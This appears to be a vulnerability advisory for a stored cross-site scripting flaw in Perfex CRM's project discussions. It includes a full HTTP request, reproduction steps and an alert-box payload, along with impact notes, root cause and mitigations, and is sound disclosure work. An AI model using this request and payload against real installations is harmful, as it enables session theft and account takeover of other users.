A Stored Cross-Site Scripting (XSS) vulnerability has been identified in the Project Discussions Module of Perfex CRM. This issue permits authenticated client users to inject malicious JavaScript payloads into the discussion description. Consequently, the injected code is executed whenever another user views the discussion. This vulnerability poses significant security risks, including session hijacking, phishing attacks, and the potential for complete account compromise. It is critical to address this vulnerability promptly to safeguard user data and ensure system integrity.
Post Request:
POST /perfex/clients/project/2 HTTP/1.1
Host: 192.168.1.11
Content-Length: 173
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://192.168.1.11
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.11/perfex/clients/project/2?group=project_discussions
Accept-Encoding: gzip, deflate, br
Cookie: contact_language=english; csrf_cookie_name=80389ebf9f4a421a35838e8b8fa60994; sp_session=vcki9i2pek4meo4qhpc5m5r8urefusof
Connection: keep-alive
csrf_token_name=80389ebf9f4a421a35838e8b8fa60994&project_id=2&action=new_discussion&subject=Testing+Discussion&description=%26lt%3Bimg+src%3Dx+onerror%3Dalert%281%29%26gt%3B
Affected Endpoint
POST /perfex/clients/project/{project_id} HTTP/1.1
Proof-of-Concept (PoC)
- Client Logs In to Perfex CRM.
- Navigate to any project and then click on the discussion tab. Example URL:/clients/project/{project_id]?group=project_discussions.
- Creates a new discussion and submits the following XSS payload in the Description field:
<img src=x onerror=alert(1)>

Impact
- Attackers can steal admin session cookies via JavaScript
- Automatic Execution: Unlike click-based XSS, this payload triggers instantly when the admin views the page.
- Full Account Takeover: Inject a keylogger to capture admin input.
Root Cause Analysis
Perfex CRM fails to sanitize user input in the contract discussion section properly.
- Expected Behavior: User input should be HTML encoded or filtered for JavaScript execution.
- Actual Behavior: The system renders user input as raw HTML, leading to stored XSS.
- Flawed HTML Entity Decoding: The system decodes < and > back into < >, allowing stored JavaScript execution.
Recommended Mitigations
- Sanitize User Input: Apply
htmlspecialchars()
orstrip_tags()
on user-submitted comments. - Use Content Security Policy (CSP): Implement CSP rules to block inline JavaScript execution.
- Enable XSS Protection in CodeIgniter: Use
$this->security->xss_clean($input)
before rendering data. - Validate & Escape Output Properly: Ensure all user-generated content is escaped before being displayed.
The development team has been informed of the identified vulnerability. The developers have confirmed the issue, and an official patch is currently pending release. Github Link For This Advisory.